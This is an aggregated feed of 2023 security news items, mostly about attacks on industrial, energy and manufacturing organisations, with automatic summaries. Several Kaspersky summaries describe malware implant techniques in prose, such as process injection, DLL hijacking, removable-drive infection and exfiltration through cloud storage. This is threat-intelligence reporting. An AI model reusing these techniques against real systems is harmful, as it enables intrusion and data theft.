      Autosummary: “Our goal is to alleviate the significant struggles that manufacturers, enterprises, and consultants globally face today when securing XIoT software and firmware, not only when building these products but also understanding the latent risk and impact of the latest exploitable vulnerability on devices in the field,” said Thomas Pace, CEO of NetRise. "


      Dynatrace Security Analytics detects and blocks common application attacks

      industry
      2023-08-09 https://www.helpnetsecurity.com/2023/08/09/dynatrace-security-analytics/

      Dynatrace introduced Security Analytics, a new Dynatrace platform solution designed to help organizations better defend against threats to their hybrid and multicloud environments. Dynatrace Security Analytics leverages Davis AI, which combines predictive and causal AI techniques to provide security analysts with the precise answers and data context they need to prioritize and investigate threats and vulnerabilities. Later this year, Security Analytics will also include generative AI capabilities as part of Dynatrace’s planned expansion to provide … More

      The post Dynatrace Security Analytics detects and blocks common application attacks appeared first on Help Net Security.

      "

      Autosummary: Today’s security analytics platforms combine features to enable analytics, investigation, automation, threat hunting, dashboards, and reporting to help security analysts be more effective.” "


      Ransomware attacks cost manufacturing sector $46 billion in downtime since 2018, report claims

      exploits industry
      2023-08-04 https://www.tripwire.com/state-of-security/ransomware-attacks-cost-manufacturing-sector-46-billion-downtime-2018-report
      Newly-released research reveals the eye-watering costs that the manufacturing sector has suffered in recent years at the hands of ransomware. Read more in my article on the Tripwire State of Security blog. "

      Autosummary: "


      Microsoft Exposes Russian Hackers' Sneaky Phishing Tactics via Microsoft Teams Chats

      financial industry rusia-ucrania
      2023-08-03 https://thehackernews.com/2023/08/microsoft-exposes-russian-hackers.html
      Microsoft on Wednesday disclosed that it identified a set of highly targeted social engineering attacks mounted by a Russian nation-state threat actor using credential theft phishing lures sent as Microsoft Teams chats. The tech giant attributed the attacks to a group it tracks as Midnight Blizzard (previously Nobelium). It's also called APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes. "

      Autosummary: " Microsoft said the campaign, observed since at least late May 2023, affected less than 40 organizations globally spanning government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. "


      Hacktivists fund their operations using common cybercrime tactics

      industry
      2023-08-03 https://www.bleepingcomputer.com/news/security/hacktivists-fund-their-operations-using-common-cybercrime-tactics/
      Hacktivist groups that operate for political or ideological motives employ a broad range of funding methods to support their operations. [...] "

      Autosummary: Finally, Killnet has attempted to extort victims into paying ransom to stop DDoS attacks or delete stolen data, like in the case of RuTor in August 2022, BlackSprut in November 2022, the Latvian government in November 2022, and NATO in April 2023. Killnet set up a hack-for-hire service in March 2023, announced a new DDoS-for-hire service in July 2023, and launched a "Dark School" training program selling nine hacking courses to interested hackers in May 2023. "


      Industrial Control Systems Vulnerabilities Soar: Over One-Third Unpatched in 2023

      industry
      2023-08-02 https://thehackernews.com/2023/08/industrial-control-systems.html
      About 34% of security vulnerabilities impacting industrial control systems (ICSs) that were reported in the first half of 2023 have no patch or remediation, registering a significant increase from 13% the previous year. According to data compiled by SynSaber, a total of 670 ICS product flaws were reported via the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in the first half of "

      Autosummary: Some of the other notable findings are as follows: Mitsubishi Electric (20.5%), Siemens (18.2%), and Rockwell Automation (15.9%) were the most impacted vendors in the critical manufacturing sector; Hitachi Energy (39.5%), Advantech (10.5%), Delta Electronics, and Rockwell Automation (both 7.9%) were the most impacted vendors in the energy sector; Siemens emerged as the leading entity producing the most CVEs through the first half of 2023, accounting for 41 ICS advisories; use after free, out-of-bounds read, improper input validation, out-of-bounds write, and race condition were the top five software weaknesses. "


      Warning over medical clinics using fake Google reviews

      industry
      2023-08-01 https://www.bbc.co.uk/news/technology-66329833?at_medium=RSS&at_campaign=KARANGA
      The BBC tracked down UK companies using fake reviews to boost their visibility in Google results. "

      Autosummary: "


      Common TTPs of attacks against industrial organizations. Implants for gathering data

      industry
      2023-07-31 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-gathering-data/
      This part of the research is devoted to second stage malware used to gather data on infected systems of industrial organizations. "

      Autosummary: When run with parameter --2, it restarts itself with parameter --1. When run with parameter --1, it starts the “msiexec.exe” process, reads and decrypts the payload, and injects it into the memory of the “msiexec.exe” process. Once the payload starts to be executed in the memory of “msiexec.exe”, it runs into an endless loop consisting of 6 simple steps: create folders for file storage (if they do not exist) and find the path to “WinRar.exe”; decrypt strings; read config and start searching for files on all disks; copy files and write log; archive copied files and clean up; sleep for 10 minutes. Main loop of the implant designed to collect local files. First, the implant creates the folder “C:\ProgramData\NetWorks”, then it creates one subfolder for temporary file storage (“C:\ProgramData\NetWorks\fl”) and one subfolder for archived data storage (“C:\ProgramData\NetWorks\ZZ”). The implant also checks “%TEMP%\TCABC8.tmp” for the following files that are used to infect a removable drive whose serial number matches the name of the folder: “mcods.exe”, which is a legitimate McAfee executable vulnerable to DLL hijacking; “McVsoCfg.dll”, which is the second-step payload; “DOC”, “PDF” or “DIR” files, which define the lure link file to be used. It is obvious that the presence of the files mentioned above in the folder assigned to a specific removable drive indicates that the attackers first analyze the contents of removable drives for some time and only then copy the files used to infect a specific removable drive to the folder specified. 
File structure of a temp folder on an infected host and an infected removable drive. Then, depending on the config and the extension (“DOC”, “PDF”, or “DIR”) of the file found in the temp directory, the main module recursively searches the drive’s root path for either a file (with the extension “.docx” or “.pdf”) or a folder. Fragment of the second-step worm, “McVsoCfg.dll” – removing itself from the infected drive. Step 3: The third-step implant, “msgui.exe”, is quite small and simple – it is designed to execute a batch script with “cmd.exe” to collect data and save the output to the drive’s “$RECYCLE.BIN” folder so that it can be collected by the main module of the malware (when connected to the originally infected host). 
Fragment of the “msgui.exe” implant’s CMD commands used to gather information. Fragment of the third-step malware, “msgui.exe”, designed to collect host info and run fourth-step malware (if it exists). Step 4: The fourth-step malware consists of two files: a simple dropper of the payload (similar to that used by second-step malware). Depending on their settings, both modules may collect information about a drive, as well as capture screenshots and window titles on the infected host, search for and copy documents (.doc, .docx, .xls, .xlsx, .ppt, .pptx) and images (.png, .jpeg, .jpg, .bmp). "


      Israel's largest oil refinery website offline amid cyber attack claims

      industry
      2023-07-30 https://www.bleepingcomputer.com/news/security/israels-largest-oil-refinery-website-offline-amid-cyber-attack-claims/
      Website of Israel's largest oil refinery operator, BAZAN Group, is inaccessible from most parts of the world as threat actors claim to have hacked the Group's cyber systems. [...] "

      Autosummary: Bazan Group website shows an "Access Denied" error message (BleepingComputer). Cyber Avengers claims responsibility: In a Telegram channel, Iranian hacktivist group "Cyber Avengers", aka "CyberAv3ngers", has claimed responsibility for breaching BAZAN's network. "


      Israel's largest oil refinery website offline after DDoS attack

      industry
      2023-07-30 https://www.bleepingcomputer.com/news/security/israels-largest-oil-refinery-website-offline-after-ddos-attack/
      Website of Israel's largest oil refinery operator, BAZAN Group, is inaccessible from most parts of the world as threat actors claim to have hacked the Group's cyber systems. [...] "

      Autosummary: These included diagrams of "Flare Gas Recovery Unit," "Amine Regeneration" system, a petrochemical "Splitter Section," and PLC code, as seen by BleepingComputer. "


      The Week in Ransomware - July 28th 2023 - New extortion tactics

      exploits ransomware industry
      2023-07-28 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-28th-2023-new-extortion-tactics/
      With ransom payments declining, ransomware gangs are evolving their extortion tactics to utilize new methods to pressure victims. [...] "

      Autosummary: Finally, we learned more about some recent attacks. Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @Seifreed, @malwareforme, @BleepinComputer, @LawrenceAbrams, @demonslay335, @struppigel, @DanielGallagher, @malwrhunterteam, @VK_Intel, @serghei, @fwosar, @Ionut_Ilascu, @FourOctets, @jorntvdw, @PolarToffee, @jgreigj, @BrettCallow, @SophosXOps, @eSentire, @vxunderground, @AlvieriD, and @pcrisk. "


      Heart monitor manufacturer hit by cyberattack, takes systems offline

      industry ciber
      2023-07-27 https://www.bitdefender.com/blog/hotforsecurity/heart-monitor-manufacturer-hit-by-cyberattack-takes-systems-offline/
      CardioComm, a Canadian company which provides heart-monitoring technology to hospitals and consumers, has revealed that it has been forced to take its systems offline following a cyberattack. Read more in my article on the Hot for Security blog. "

      Autosummary: "


      SeeMetrics Security Performance Boards empowers CISOs to validate security programs

      industry
      2023-07-26 https://www.helpnetsecurity.com/2023/07/26/seemetrics-security-performance-boards/

      SeeMetrics launched its new Security Performance Boards. Organized by security domains, the new Security Performance Boards are a collection of out-of-the box metrics that empower security leaders to measure the performance of their technologies, processes, and people in real time. SeeMetrics is the first ever data platform that drives cybersecurity performance assessment directly from the operational stack and “inside the perimeter”. With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and … More

      The post SeeMetrics Security Performance Boards empowers CISOs to validate security programs appeared first on Help Net Security.

      "

      Autosummary: With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and business-aligned view of measurements, metrics, and Key Performance Indicators (KPIs), which shows trends, risks, and historical context. "


      Microsoft previews Defender for IoT firmware analysis service

      industry
      2023-07-26 https://www.bleepingcomputer.com/news/microsoft/microsoft-previews-defender-for-iot-firmware-analysis-service/
      Microsoft announced the public preview of a new Defender for IoT feature that helps analyze the firmware of embedded Linux devices like routers for security vulnerabilities and common weaknesses. [...] "

      Autosummary: "


      Windows 11 23H2 getting an energy report with app's power usage

      industry
      2023-07-22 https://www.bleepingcomputer.com/news/microsoft/windows-11-23h2-getting-an-energy-report-with-apps-power-usage/
      Microsoft is making it easier to see how much energy your apps use in Windows 11 over a given period by introducing a detailed power consumption page in the latest 23H2 update. [...] "

      Autosummary: Battery usage per app on Windows 11's energy page. In addition, the page includes a section for "battery usage per app", allowing users to select between “Total usage”, “In use”, “Background”, and “Name”. "


      Brazil's Embraer plans to build electric flying taxi factory near Sao Paolo

      latam industry
      2023-07-21 https://www.bbc.co.uk/news/world-latin-america-66264229?at_medium=RSS&at_campaign=KARANGA
      Embraer says it will build electric aircraft with hopes they will take flight from 2026. "

      Autosummary: "


      Attackers intensify DDoS attacks with new tactics

      industry
      2023-07-21 https://www.helpnetsecurity.com/2023/07/21/ddos-attacks-h1-2023/

      As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks, according to Gcore. The maximum attack power rose from 600 to 800 Gbps. UDP flood attacks were most common and amounted to 52% of total attacks, while SYN flood accounted for 24%. In third place was TCP flood. The most-attacked business sectors are gaming, telecom, and financial. The longest attack duration in Q2/Q3 was seven days, 16 hours, and 22 minutes. … More

      The post Attackers intensify DDoS attacks with new tactics appeared first on Help Net Security.

      "

      Autosummary: The increase in the DDoS attack volume in the H1 of 2023 There has been a significant increase in the power and volume of DDoS attacks over the last two years: In 2021, the capacity of DDoS attacks was up to 300 Gbps. "


      Common TTPs of attacks against industrial organizations. Implants for remote access

      industry
      2023-07-20 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-remote-access/
      In this article (which is the first part of the report) we analyze common TTPs of implants used by threat actors to establish a persistent remote access channel into the infrastructure of industrial organizations. "

      Autosummary: Win32.MeatBall. Implant using Yandex Cloud as C2. Appendix II – MITRE ATT&CK Mapping: The table below contains all the TTPs identified in the analysis of the activity described in this report. Variants of FourteenHi. Backdoor. They accept a relatively long list of commands, including: upload arbitrary files, download arbitrary files, run arbitrary commands, set communication delay, start reverse shell, terminate own process and remove persistence. Strings found in a sample which uses Yandex Disk. Log containing the result of command execution using cmd. Conclusion: The tendency to abuse cloud services (e.g., Dropbox, Yandex, Google, etc.) is not new, but it continues to expand, because it is hard to restrict / mitigate in cases when an organization’s business processes depend on using such services.
The entire stack of implants used in attacks can be divided into three categories based on their roles: first-stage implants for persistent remote access and initial data gathering; second-stage implants for gathering data and files, including from air-gapped systems; third-stage implants and tools used to upload data to C2. In this article (which is the first part of the report) we analyze common TTPs of first-stage implants used by threat actors to establish a persistent remote access channel into the infrastructure of industrial organizations. Data collected: computer name, user name, IP address, MAC address, OS version, path to %System%. To upload the data collected to C2, the implant sends a request using an embedded API token to create a directory with a name that is unique to the victim host. "


      Impinj M800 series RAIN RFID tag chips advance item connectivity for enterprise IoT deployments

      industry
      2023-07-20 https://www.helpnetsecurity.com/2023/07/20/impinj-m800-series-rain-rfid-tag-chips/

      Impinj released the Impinj M800 series RAIN RFID tag chips to meet enterprise needs for item connectivity in global IoT deployments. The new M800 series delivers readability in enterprise deployments and offers enhanced tag reliability and manufacturability. The new chips demonstrate Impinj’s ongoing commitment to increase the speed, distance, and reliability at which a RAIN RFID system can discover, engage, and protect connected items. “Today, we have taken another big step toward our mission to … More

      The post Impinj M800 series RAIN RFID tag chips advance item connectivity for enterprise IoT deployments appeared first on Help Net Security.

      "

      Autosummary: Improving tag readability, reliability, and manufacturability The Impinj M800 series, comprising the M830 and M850 tag chips, sets new performance benchmarks while improving features of the Impinj M700 series: Improved tag readability. "


      ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder

      industry
      2023-07-20 https://securityaffairs.com/148651/hacking/alphv-blackcat-clop-estee-lauder.html

      The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors, ALPHV/BlackCat and Clop, claim to have hacked the cosmetics giant company Estée Lauder and added the company to their Tor leak […]

      The post ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder appeared first on Security Affairs.

      "

      Autosummary: Even if the company did not share details about the attack, it is likely that the Clop ransomware group has breached its network by exploiting the MOVEit Transfer zero-day vulnerability. "


      Paris 2024 Olympics: Concern over French plan for AI surveillance

      industry
      2023-07-19 https://www.bbc.co.uk/news/world-europe-66122743?at_medium=RSS&at_campaign=KARANGA
      CCTV will use algorithms to detect fights and abandoned bags - but not everyone is happy about it. "

      Autosummary: "


      CERT-UA Uncovers Gamaredon's Rapid Data Exfiltration Tactics Following Initial Compromise

      industry
      2023-07-17 https://thehackernews.com/2023/07/cert-ua-uncovers-gamaredons-rapid-data.html
      The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise. "As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in "

      Autosummary: According to CERT-UA, GammaSteel is used to exfiltrate files matching a specific set of extensions – .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, and .mdb "


      Growing a 15,000 strong automotive cybersecurity group with John Heldreth

      industry ciber
      2023-07-17 https://www.helpnetsecurity.com/2023/07/17/automotive-cybersecurity-john-heldreth/

      The fury with which the automotive community pried, prodded, and eventually outsmarted existing functions that are software-driven is nothing short of horrifying. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea. Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise … More

      The post Growing a 15,000 strong automotive cybersecurity group with John Heldreth appeared first on Help Net Security.

      "

      Autosummary: “For me this means bringing all of those different systems together into a centralized place where you can organize, identify by time or by product, by asset, and so on, so that you can understand the full picture,” said John. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea. “What we’re trying to do, of course, is to reduce any risk to our customers,” said John. Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise in cyber threats targeted at their vehicles. "


      GST: New tax threatens India's booming online gaming industry

      industry
      2023-07-13 https://www.bbc.co.uk/news/world-asia-india-66161596?at_medium=RSS&at_campaign=KARANGA
      The industry says it has been blindsided by the government's "catastrophic" tax decision. "

      Autosummary: "


      Rockwell Automation ControlLogix Bugs Expose Industrial Systems to Remote Attacks

      exploits industry
      2023-07-13 https://thehackernews.com/2023/07/rockwell-automation-controllogix-bugs.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has alerted of two security flaws impacting Rockwell Automation ControlLogix EtherNet/IP (ENIP) communication module models that could be exploited to achieve remote code execution and denial-of-service (DoS). "The results and impact of exploiting these vulnerabilities vary depending on the ControlLogix system configuration, but "

      Autosummary: Impacted devices include 1756-EN2T, 1756-EN2TK, 1756-EN2TXT, 1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT, 1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT, 1756-EN2F, 1756-EN2FK, 1756-EN3TR, 1756-EN3TRK, 1756-EN4TR, 1756-EN4TRK, and 1756-EN4TRXT. "


      SonicWall urges organizations to fix critical flaws in GMS/Analytics products

      industry
      2023-07-13 https://securityaffairs.com/148411/security/sonicwall-critical-flaws-gms-analytics.html

      SonicWall fixed multiple critical vulnerabilities impacting its GMS firewall management and Analytics management and reporting engine. SonicWall addressed multiple critical vulnerabilities in its Global Management System (GMS) firewall management and Analytics network management and reporting engine. The company fixed 15 vulnerabilities that were disclosed in a Coordinated Vulnerability Disclosure (CVD) report in conjunction with NCCGroup. […]

      The post SonicWall urges organizations to fix critical flaws in GMS/Analytics products appeared first on Security Affairs.

      "

      Autosummary: "


      Unnamed APT eyes vulnerabilities in Rockwell Automation industrial controllers (CVE-2023-3595 CVE-2023-3596)

      industry
      2023-07-13 https://www.helpnetsecurity.com/2023/07/13/cve-2023-3595-cve-2023-3596/

      Rockwell Automation has fixed two vulnerabilities (CVE-2023-3595, CVE-2023-3596) in the communication modules of its ControlLogix industrial programmable logic controllers (PLCs), ahead of expected (and likely) in-the-wild exploitation. “An unreleased exploit capability leveraging these vulnerabilities is associated with an unnamed APT (Advanced Persistent Threat) group,” industrial cybersecurity company Dragos has stated on Wednesday. About the vulnerabilities (CVE-2023-3595, CVE-2023-3596) CVE-2023-3595 allows attackers to manipulate firmware memory, perform remote code execution with persistence, and modify, deny, and exfiltrate … More

      The post Unnamed APT eyes vulnerabilities in Rockwell Automation industrial controllers (CVE-2023-3595 CVE-2023-3596) appeared first on Help Net Security.

      "

      Autosummary: CIP Socket Object should be disabled, if possible, they say, and organizations should monitor for: unexpected or out-of-specification CIP packets to CIP objects implemented in ControlLogix communications modules; unknown scanning on a network for CIP-enabled devices; unscheduled firmware updates or logic downloads; unexpected disabling of secure boot options; arbitrary writes to communication module memory or firmware; uncommon firmware file names. “Knowing about an APT-owned vulnerability before exploitation is a rare opportunity for proactive defense for critical industrial sectors. "


      Staying ahead of the “professionals”: The service-oriented ransomware crime industry

      exploits ransomware industry
      2023-07-12 https://www.helpnetsecurity.com/2023/07/12/ransomware-industry-profitability/

      Ransomware has been a hugely profitable industry for criminal gangs for the last few years. The total amount of ransom paid since 2020 is estimated to be at least $2 billion, and this has both motivated and enabled the groups who are profiting from this activity to become more professional. These groups are emulating the legitimate tech ecosystem and seeking greater efficiencies and profits: they outsource common, complex problems; they subcontract work; and they employ … More

      The post Staying ahead of the “professionals”: The service-oriented ransomware crime industry appeared first on Help Net Security.

      "

      Autosummary: Have an incident response plan – If you have threat intelligence, self-awareness, controls, and policies, you can devise a plan of action for your organization to follow in the event of an incident. Actions on target are often achieved by living off the land, i.e., abusing already present operating system tools and the use of common commodity post-exploitation frameworks such as Cobalt Strike, Metasploit, and Sliver. "


      DirectDefense partners with SCADAfence to strengthen industrial cybersecurity

      industry ciber
      2023-07-12 https://www.helpnetsecurity.com/2023/07/12/directdefense-scadafence/

      DirectDefense announced its partnership with SCADAfence to enhance industrial cybersecurity and safeguard OT Networks in the era of IIoT. The SCADAfence Platform enables critical infrastructure and manufacturing organizations with complex Operational Technology (OT) networks to embrace the benefits of the Industrial Internet of Things (IIoT) by reducing cyber risks and mitigating operational threats. With the rise of the IIoT, OT devices are becoming more interconnected, allowing for enhanced automation and remote monitoring. While these technologies … More

      The post DirectDefense partners with SCADAfence to strengthen industrial cybersecurity appeared first on Help Net Security.

      "

      Autosummary: By leveraging advanced algorithms, machine learning, and AI, it automatically discovers assets, detects anomalies, and identifies security risks that can compromise the availability and reliability of OT networks. "


      CyberCatch collaborates with Proficio to protect users against cyber threats

      industry
      2023-07-12 https://www.helpnetsecurity.com/2023/07/12/cybercatch-proficio/

      CyberCatch and Proficio announced a strategic partnership to join forces to market and deliver a combined AI-enabled solution for organizations worldwide. CyberCatch’s proprietary, artificial intelligence-enabled (AI) Software-as-a-Service (SaaS) solution is designed to help organizations implement all mandated and necessary controls, detect control failures promptly, and facilitate their resolution, enabling continuous compliance and cyber risk mitigation. Proficio’s MDR services provide round-the-clock protection, enabling organizations to proactively identify and respond to potential threats in real-time. With an … More

      The post CyberCatch collaborates with Proficio to protect users against cyber threats appeared first on Help Net Security.

      "

      Autosummary: "


      Industry responses and strategies for navigating the tides of DDoS attacks

      industry
      2023-07-11 https://www.helpnetsecurity.com/2023/07/11/ddos-attacks-fight-video/

      It is important not to underestimate the potentially devastating impact of DDoS attacks. Organizations of all sizes should take proactive measures to mitigate and safeguard against DDoS attacks, ensuring the continuity and resilience of their operations. Throughout this Help Net Security video round-up, experts emphasize the need for a collective effort in the fight against DDoS attacks. Complete videos Bryant Rump, Principal Security Architect at Neustar Security Services, talks about the challenges of mitigating immense … More

      The post Industry responses and strategies for navigating the tides of DDoS attacks appeared first on Help Net Security.

      "

      Autosummary: "


      Foxconn: Apple supplier drops out of $20bn India factory plan

      industry
      2023-07-11 https://www.bbc.co.uk/news/business-66160997?at_medium=RSS&at_campaign=KARANGA
      Some analysts say Foxconn's decision marks a setback to the country's technology industry ambitions. "

      Autosummary: "


      Alteryx Analytics Automation powered by AWS allows CFOs to modernize financial processes

      financial industry
      2023-07-11 https://www.helpnetsecurity.com/2023/07/11/alteryx-analytics-automation/

      Alteryx announced decision intelligence and intelligent automation capabilities on AWS designed to empower chief financial officers (CFOs) and finance leaders to embrace cloud and data analytics as strategic tools for their modernization goals. “Analytic insights help us tailor digital transformation solutions based on our clients’ needs to achieve the greatest impact for their business,” said Ana Margarita Albir, president at ADL Labs. “Leveraging Alteryx and AWS, we are able to integrate capabilities across any data … More

      The post Alteryx Analytics Automation powered by AWS allows CFOs to modernize financial processes appeared first on Help Net Security.

      "

      Autosummary: “Organizations can benefit from templates that help data analysts and line-of-business users to use, customize, extend, and integrate enterprise data with intelligent automation workflows that assist with record to report, procure to pay, and order to cash processes.” "


      Honeywell acquires SCADAfence to strengthen its OT cybersecurity portfolio

      industry ciber
      2023-07-10 https://www.helpnetsecurity.com/2023/07/10/honeywell-scadafence/

      Honeywell has agreed to acquire SCADAfence, a provider of OT and IoT cybersecurity solutions for monitoring large-scale networks. SCADAfence brings proven capabilities in asset discovery, threat detection and security governance which are key to industrial and buildings management cybersecurity programs. The OT cybersecurity industry is expected to grow to greater than $10 billion in the next several years. Particularly in the industrial sector, cyberattacks focused on OT systems can be a significant source of unplanned … More

      The post Honeywell acquires SCADAfence to strengthen its OT cybersecurity portfolio appeared first on Help Net Security.

      "

      Autosummary: “SCADAfence is an ideal complement to Honeywell’s OT cybersecurity portfolio and, when combined with the Honeywell Forge Cybersecurity+ suite, it enables us to provide an end-to-end solution with applicability to asset, site and enterprise across key Honeywell sectors,” said Dehoff. "


      Over 130,000 solar energy monitoring systems exposed online

      industry
      2023-07-06 https://www.bleepingcomputer.com/news/security/over-130-000-solar-energy-monitoring-systems-exposed-online/
      Security researchers are warning that tens of thousands of photovoltaic (PV) monitoring and diagnostic systems are reachable over the public web, making them potential targets for hackers. [...] "

      Autosummary: "


      CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector

      exploits industry
      2023-07-06 https://securityaffairs.com/148216/hacking/solarview-flaws-energy-sector.html

      A vulnerability in SolarView product can be exploited in attacks targeting organizations in the energy sector. Researchers from the cybersecurity firm VulnCheck reported that the vulnerability CVE-2022-29303 in the solar power monitoring Contec SolarView product can be exploited in attacks targeting organizations in the energy sector. CVE-2022-29303 is an unauthenticated and remote command injection vulnerability […]

      The post CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector appeared first on Security Affairs.

      "

      Autosummary: "


      TXOne Networks introduces Stellar to secure OT/ICS devices from malware and abuse threats

      exploits industry
      2023-07-06 https://www.helpnetsecurity.com/2023/07/06/txone-networks-stellar/

      TXOne Networks announced its Stellar solution for defending operational stability. Employing TXOne Networks’ approach to security, Cyber-Physical System Detection and Response (CPSDR), Stellar supports the priorities of security and operations without either team having to sacrifice capability or performance. Already protecting customers in semiconductors, manufacturing, oil and gas, automotive, pharmaceuticals and many other industries, Stellar offers seamless detection and prevention capabilities with complete oversight for legacy and new OT devices. With intuitive management and informed … More

      The post TXOne Networks introduces Stellar to secure OT/ICS devices from malware and abuse threats appeared first on Help Net Security.

      "

      Autosummary: "


      Surviving the 800 Gbps Storm: Gain Insights from Gcore's 2023 DDoS Attack Statistics

      industry
      2023-07-06 https://thehackernews.com/2023/07/surviving-800-gbps-storm-gain-insights.html
      Gcore Radar is a quarterly report prepared by Gcore that provides insights into the current state of the DDoS protection market and cybersecurity trends. This report offers you an understanding of the evolving threat landscape and highlights the measures required to protect against attacks effectively. It serves as an insight for businesses and individuals seeking to stay informed about the "

      Autosummary: Attack type spread, Q1–Q2 2023: 52% UDP, 24% SYN flood, 19% TCP flood, 5% other traffic. According to Andrey Slastenov, Head of Web Security at Gcore, there has been an increase in the frequency of complex, multi-vector attacks by attackers. Attacked sectors: 30.1% gaming, 24.7% telecom, 16.8% financial, 28.4% other. The gaming industry was the most targeted sector, accounting for a considerable proportion of the DDoS attacks. "


      How ransomware impacts the healthcare industry

      exploits ransomware industry
      2023-07-05 https://www.helpnetsecurity.com/2023/07/05/how-ransomware-impacts-healthcare-industry-video/

      Healthcare continues to be one of the most attractive targets for cyberattackers, and the number of breaches affecting the industry is increasing yearly. In this Help Net Security video, Steve Gwizdala, VP of Healthcare at ForgeRock, discusses how vigilance and new ways of enhancing cybersecurity measures will be crucial to healthcare organizations and businesses responsible for protecting consumers’ online information – across the entire supply chain. There needs to be more than the traditional password … More

      The post How ransomware impacts the healthcare industry appeared first on Help Net Security.

      "

      Autosummary: "


      Swedish data protection authority rules against the use of Google Analytics

      industry
      2023-07-05 https://securityaffairs.com/148157/laws-and-regulations/swedish-data-protection-authority-google-analytics.html

      Swedish data protection watchdog warns companies against using Google Analytics due to the risk of surveillance operated by the US government. The Swedish data protection watchdog warned businesses against using Google Analytics due to the risk of surveillance carried out by the US government. The Swedish Authority for Privacy Protection (IMY) conducted audits against CDON, […]

      The post Swedish data protection authority rules against the use of Google Analytics appeared first on Security Affairs.

      "

      Autosummary: "


      RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors

      exploits industry
      2023-07-05 https://thehackernews.com/2023/07/redenergy-stealer-as-ransomware-threat.html
      A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages. The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for "

      Autosummary: Following a successful breach, the malicious binary is used as a conduit to set up persistence, perform the actual browser update, and also drop a stealer capable of covertly harvesting sensitive information and encrypting the stolen files, leaving the victims at risk of potential data loss, exposure, or even the sale of their valuable data. "


      RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild

      exploits industry
      2023-07-05 https://securityaffairs.com/148193/malware/redenergy-stealer-as-a-ransomware.html

      RedEnergy is a sophisticated stealer-as-a-ransomware that was employed in attacks targeting energy utilities, oil, gas, telecom, and machinery sectors. Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. The malware allows operators to steal information from various browsers, it also supports ransomware capabilities. […]

      The post RedEnergy Stealer-as-a-Ransomware employed in attacks in the wild appeared first on Security Affairs.

      "

      Autosummary: Zscaler ThreatLabz researchers discovered a new Stealer-as-a-Ransomware named RedEnergy used in attacks against energy utilities, oil, gas, telecom, and machinery sectors. "


      Google Analytics data transfer to U.S. brings $1 million fine to Swedish firms

      industry
      2023-07-04 https://www.bleepingcomputer.com/news/security/google-analytics-data-transfer-to-us-brings-1-million-fine-to-swedish-firms/
      The Swedish Authority for Privacy Protection (Integritetsskyddsmyndigheten - IMY) has fined two companies a combined 12.3 million SEK (€1 million/$1.1 million) for using Google Analytics and warned two others about the same practice. [...]



      Swedish Data Protection Authority Warns Companies Against Google Analytics Use

      industry
      2023-07-04 https://thehackernews.com/2023/07/swedish-data-protection-authority-warns.html
      The Swedish data protection watchdog has warned companies against using Google Analytics due to risks posed by U.S. government surveillance, following similar moves by Austria, France, and Italy last year. The development comes in the aftermath of an audit initiated by the Swedish Authority for Privacy Protection (IMY) against four companies CDON, Coop, Dagens Industri, and Tele2. "In its audits



      LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC

      ransomware industry
      2023-07-01 https://securityaffairs.com/148022/cyber-crime/tsmc-lockbit-ransomware.html

      The LockBit ransomware group this week claimed to have hacked Taiwan Semiconductor Manufacturing Company (TSMC) and demanded a $70 million ransom. TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc. As reported by BleepingComputer, on Wednesday, […]




      Over 1500 gas stations disrupted in Canada, after energy giant hacked

      industry
      2023-06-29 https://www.bitdefender.com/blog/hotforsecurity/over-1500-gas-stations-disrupted-in-canada-after-energy-giant-hacked/
      Suncor, one of the largest energy companies in North America, has suffered a cyber attack that left Canadian motorists unable to make gas station purchases with payment cards, and even disabled car washes. Read more in my article on the Hot for Security blog.



      Bitdefender acquires Horangi Cyber Security to expand its unified risk and security analytics platform

      industry
      2023-06-28 https://www.helpnetsecurity.com/2023/06/28/bitdefender-horangi-cyber-security/

